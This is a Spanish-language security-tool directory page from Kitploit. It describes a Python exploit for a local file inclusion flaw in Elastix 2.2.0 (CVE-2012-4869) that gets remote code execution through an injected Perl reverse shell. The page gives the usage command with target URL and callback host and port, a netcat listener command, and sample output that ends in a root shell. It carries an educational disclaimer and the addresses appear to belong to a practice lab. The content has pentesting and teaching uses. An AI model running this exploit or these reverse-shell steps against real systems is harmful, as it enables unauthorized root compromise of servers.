Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Elastix-2.2.0-CVE-2012-4869 — Script de exploit en Python para la vulnerabilidad LFI de Elastix 2.2.0 (CVE-2012-4869) que permite la ejecución remota de código mediante la inyección de un payload de reverse shell en Perl. | Kitploit
Herramientas/GitHubGitHub/cyberdesu/elastix-2.2.0-cve-2012-4869
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubcyberdesu/elastix-2.2.0-cve-2012-4869

Elastix-2.2.0-CVE-2012-4869

Script de exploit en Python para la vulnerabilidad LFI de Elastix 2.2.0 (CVE-2012-4869) que permite la ejecución remota de código mediante la inyección de un payload de reverse shell en Perl.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Inclusión de Archivos Locales en Elastix 2.2.0 - CVE-2012-4869

Descripción

Este script explota una vulnerabilidad de Inclusión de Archivos Locales (LFI) en Elastix 2.2.0, permitiendo la ejecución remota de código (RCE) mediante la inyección de comandos a través del endpoint callme_page.php. El exploit está basado en CVE-2012-4869.

Características

  • Omite la verificación de certificados TLS.
  • Utiliza un payload de reverse shell en Perl.
  • Soporta LHOST y LPORT personalizados para el reverse shell.
  • Suprime las advertencias de seguridad HTTPS.

Requisitos

  • Python 3
  • Módulo requests

Instale las dependencias usando:

root@kitploit:~
pip install requests

Uso

root@kitploit:~
python exploit.py <URL> --LHOST <TU_IP> --LPORT <TU_PUERTO>

Ejemplo:

root@kitploit:~
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001

Configurar el Listener del Reverse Shell

Antes de ejecutar el exploit, inicie un listener de Netcat en su máquina:

root@kitploit:~
nc -lvnp 9001

Salida de la Ejecución del Exploit

root@kitploit:~
[*] Ejecutando Exploit LFI de Elastix 2.2.0 - CVE-2012-4869
[*] Objetivo: https://10.129.229.183
[*] Escuchando en 10.10.14.23:9001

[+] Exploit enviado exitosamente, esperando reverse shell...

[+] Conexión desde 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)

Notas

  • Si el reverse shell no se conecta, asegúrese de que las reglas del firewall y la configuración de SELinux permitan conexiones salientes.
  • Se pueden utilizar payloads alternativos (por ejemplo, Bash o Python) si Perl no está disponible.
  • Asegúrese de que su LHOST sea accesible desde la máquina objetivo.

Descargo de responsabilidad

Este exploit es únicamente para fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado es ilegal. El autor no se hace responsable del mal uso de esta herramienta.

Descargar herramienta